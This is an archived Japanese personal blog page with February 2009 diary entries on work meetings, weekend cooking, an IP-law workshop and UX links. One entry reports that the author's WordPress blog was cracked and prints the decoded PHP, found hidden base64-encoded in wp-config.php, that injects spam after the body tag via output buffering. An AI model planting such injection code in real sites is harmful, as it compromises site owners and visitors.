投稿者「Atsushi」のアーカイブ

Atsushi について

Information Architect

090211: blog was carcked

コメントを残す

（この）blogがクラックされた。

具体的には、<body>タグの直後に64kくらいの（！）SPAM広告が埋め込まれる、というクラック。

kazuさんに指摘されて気づいたのだが、CSSを切らないと画面には表示されないようになっていた。
指摘された後もなにが起きているのかわからず、WordPressを最新ソースに差し替えたりしたのだが、直らず。

と、思っていたら、WordPress設定ファイルである、wp-config.php自体が汚染されていた。

かつ、埋め込まれたコードはbase64でエンコードされており、単純には見つからない仕組みになっていた。

ちなみにこんなコード。けらくんに解読してもらった。

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){
 $GLOBALS['sh_no']=1;
 if(file_exists('/home/www/wordpress/wp-includes/js/
 tinymce/themes/advanced/images/xp/js.php')){
   include_once('/home/www/wordpress/wp-includes/js/
   tinymce/themes/advanced/images/xp/js.php');
   if(function_exists('gml')&&!function_exists('dgobh')){
     if(!function_exists('gzdecode')){
       function gzdecode($d){
         $f=ord(substr($d,3,1));
         $h=10;
         $e=0;
         if($f&4){
           $e=unpack('v',substr($d,10,2));
           $e=$e[1];
           $h+=2+$e;
         }
         if($f&8){
           $h=strpos($d,chr(0),$h)+1;
         }
         if($f&16){
           $h=strpos($d,chr(0),$h)+1;
         }
         if($f&2){
           $h+=2;
         }
         $u=gzinflate(substr($d,$h));
         if($u===FALSE){
           $u=$d;
         }
         return $u;
       }
     }
     function dgobh($b){
       Header('Content-Encoding: none');
       $c=gzdecode($b);
       if(preg_match('/\<body/si',$c)){
         return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);
       }
       else{
         return gml().$c;
       }
     }
     ob_start('dgobh');
   }
 }
}

もう一つ自己増殖するコードも埋め込まれていた模様。

実はこのblog（underconcept）ではなく、同じサーバで運営していた別のblogが原因でこちらのblogも汚染されていた。

これはこのblogを乗せているさくらインターネットがユーザーの権限でApacheを動かしていたため、パーミッション644のファイル（ほぼすべて）が、Apacheの権限で書き換えられてしまったことに起因しそう。

問題のありそうなテーマ等は現在解析中です。

090209-10

コメントを残す

月曜午前はグループミーティング。

本日は、昨日紹介したUX Deliverablesを紹介しながら自分たちのプロセスとの比較や、知らない用語がないかの確認。

こういったかたちで全体像が提示されることで自分達のプロセスとの比較や、議論する際のスタートラインを作れるのことはたいへんよい。

大岡くんやちこちゃんなどIX/UXチーム以外の人々も参加して、むしろチームメンバーより活発に議論。

午後はプロジェクトの相談を受けに赤坂へ、その後は続けてプロジェクトミーティング。

帰り道でI佐さんよりプライベートかつコンフィデンシャルな相談を受け大いに盛り上がる。

火曜は午前はドキュメント制作などの作業。

午後からプロジェクトについての社内デザインミーティング。

「画面情報の価値」ということについて、情報量、一覧性、インタラクション（ギミック）　の有無、楽しさ（演出）といった競合もする要素のグラデーションから検討する。

その後は、CNET西田さんの紹介でウノウの山田さんとお会いする。

関係ないがウノウって関連会社にサノウってあるのね。

夜のIA100ミーティングは編集の村田さんの急な会議で延期。

090207-08

コメントを残す

ひさびさに土日ともに外出の予定が入っていない週末。

床屋にて散髪。それ以外は料理して、おむつ交換して、たまにミルクを作ってあとは原稿やプロジェクトのドキュメント執筆。

以下、覚えているメニュー：

土曜ブランチは、賞味期限切れのコンキリエパスタをトマトソースにオリーブ、ケッパー、唐辛子等々を加えたものあえたもの、ゴボウのバルサミコきんぴら。

コンキリエは窪みにソースがからむので、トマトソースがぴったり。
トマトソースはニンニクと唐辛子をオリーブオイルで炒めて、オリーブ、ケッパーを加えてからホールトマトを入れて煮ただけの簡易ソース、だったが、仕上げに黒こしょうをきかせたらぴりっとして美味だった。

晩は、かぶとにんじん、鶏肉その他のポトフ、鶏胸肉のソテーキノコ添え、じゃがいもとエリンギのきんぴら。

鶏のソテーは僕にとって鬼門ともいうべき難敵なのだが、今日は１）ハーブで香り付けしておく、２）片面を重点的に焼く、３）蓋をして全体を蒸らす、の作戦でいったらレアにおいしく焼けた。

同時に翌日用にカボチャを醤油、みりん、砂糖で甘く煮る。

日曜朝は昨日の残りのご飯がちょっとだけあったので、あとは餅を焼いて、納豆餅、海苔餅、残り物のあんこを使ってお汁粉。それに白菜のおひたし。昨日のカボチャ。

白菜はざく切りして熱したるクルーゼに入れて白菜自身の水分でじわっと煮込む。
そこにすり下ろした生姜と、自家製ポン酢をかけていただく。あまり火を通しすぎないでしゃきしゃきしたままで食べるのがポイント。

カボチャは熱くてもおいしいが、さましてから食べると口の中で甘いのとしょっぱいのとが交互にやってきて止まらなくなる。

昼はブロッコリのペペロンチーノ唐辛子抜き。

ブロッコリの下ごしらえもわりと苦手なのだが、今日も若干まだ固かったかも。

晩は肉じゃが、キノコと豆腐の味噌汁、アスパラのオリーブオイル炒めにパルメザンチーズをあえる。

肉じゃがはたぶん作ったことがなかったが、初めて作ったにしてはうまくできた。
豚肉をルクルーゼで炒めて、そこにじゃがいも、にんじん、たまねぎを加える。
そこにみりんと酒を加えて、フタをしてじゃがいもが柔らかくなるまで弱火で煮る。
水は野菜の水分がじゃぶじゃぶ出るから入れない。
じゃがいもが柔らかくなったら、醤油をかけてもうひと煮。
最初豚肉の臭みが気になったが、しばらく放っておいたら飛んだ模様。
ご飯にかけてもおいしい。

あと、回鍋肉用に豚肩ロース肉を煮る。

回鍋肉用の豚ブロックはいつもなにを買ったらよいか忘れてしまうんだが、今回は間違わず肩ロースを購入。
ねぎの青いところは回鍋肉の豚煮用に残してある。
煮た豚は半分冷蔵庫、半分ソフト冷凍。
残った汁はスープに使える。

最近購入した新しい冷凍庫はソフト冷凍（温度が高いので冷凍しても包丁で切れる）とか、瞬間冷凍（過冷却しておいて、ショックを与えて一瞬で冷凍させて、細胞を壊さず冷凍できる）とか新機能が付いているのだが、いまいち使いこなせていない。
ソフト冷凍でフローズンヨーグルトを作るくらいか（しかしそれも凍らせっぱなしでかちんかちんになってしまう）。

090206

4件の返信

備忘録を復活

朝は寝坊したので自由が丘の浅野屋のキッシュとクリームソースパン。

午前、コンセントのステアリングコミッティーミーティング。

新規にコンセントに加わった日野さんが、今週からこのミーティングに参加。

午後からプロジェクト相談のヒアリング。
方向性としてはいくつか考えられるが、枠組みとしてエンタープライズ情報アーキテクチャ設計としてとらえられる問題提示であった。

最近やはりエンタープライズ情報アーキテクチャの課題が増えている。

そのままHCD-Netで、弁理士松倉先生を囲むワークショップ。

HCD-Netでの知財の扱いについてをテーマにしたワークショップだったが、ウェブサイトの模倣（パクリ）、納品後の企業での再利用可能性、デザインプロセスの中でできたボツ案の扱い方、オープンソースを用いた場合の納品物責任の範囲、途中成果物（flaとかpsd）の納品責任、等々身近なかつ契約になかなか明示化されていないような事柄についていろいろと伺う。

松倉先生の話で面白かったのは、松倉先生自身、ビジネスをうまくすすめるためにいかに法を運用するか、という観点で取り組んでいるという点。なので決して保守的にならずに、新しいアイデアをそこで生み出すことができているのだろう。

今後もいろいろと教えていただきたいです。

ワークショップ後はHCD-Netの小樽商科大の平澤先生らと渋谷で食事。
宮崎地鶏のお店「おじゃったもんせ」。ちょっと見た目には店とはわからない。

こちらでは、社会システムデザインと個々の企業の分担の話題で盛り上がる。
自動車のように一社で安全性能を担保しなければならない業種は存在するが、はたして、すべての情報システムはそういったシステム全体の責任をどこかが追うことができるのか、というまだ終わりがない命題。

と、ミツエーリンクスの木達くんから、このblogサイトがハッキングされていない？とのコメントをもらう。
CSSを切ってみたら、確かにされているっぽい。
デザインCSSをいじってみてもなんともなおせないようなので、ソースに手が入っているのかもしれない、、、むむむ。
WordPressをバージョンアップ（バイナリ総取っ替え）してみることにしよう。

User Experience Deliverables by Peter Morville

1件のフィードバック

白クマ本やアンビエントファインダビリティで有名な米国のIA Peter Morville氏の力作「User Experience Deliverables（ユーザーエクスペリエンスデザイン成果物リスト）」をメディアプローブの浅野さんが翻訳してくださいる

IA Spectrum: Peter Morvilleの「User Experience Deliverables」を翻訳しました

シロクマ本や『アンビエント・ファインダビリティ』でおなじみのピーター・モービル（Peter Morville）が率いるSemantic StudiosのPublicationsコンテンツが約1年半ぶり（！）に更新され、「User Experience Deliverables」という記事が公開されました。
ユーザーエクスペリエンスデザインに関わる各種の成果物のまとめという実用的な記事ではありますが、いかにもPeterらしいユーモアがちょこちょこと顔を出している、なかなか面白い内容です。

やはりIAたるもの自身が情報をうまくまとめてプレゼンテーションできねばならぬ、という好例。

IA/UX業界、Web業界の人は実際にやるかやらないかは別として、これらのキーワードの内容、相関あたりまでは追っておく必要がある。

セカイカメラ for Android

2件の返信

ニテンイチリュウ：セカイカメラ for Android

発表されるや、大きな話題と実現性への疑問が湧き上がったiPhone用AR(Augmented Reality:拡張現実)アプリ、「セカイカメラ」。

そのセカイカメラよりもひと足はやくモバイルでのARを実装したアプリケーションをオーストリアのMozilityが開発、そしてそれをなんとオランダの銀行「ING」が採用。

すごい、いくつか課題が指摘されているセカイカメラの世界をあっさり実現してしまった。

早速実用化されているのもすごい。しかも保守的に思われがちな銀行で。

とっても使いやすいと思うので、日本でも試してみたいですね。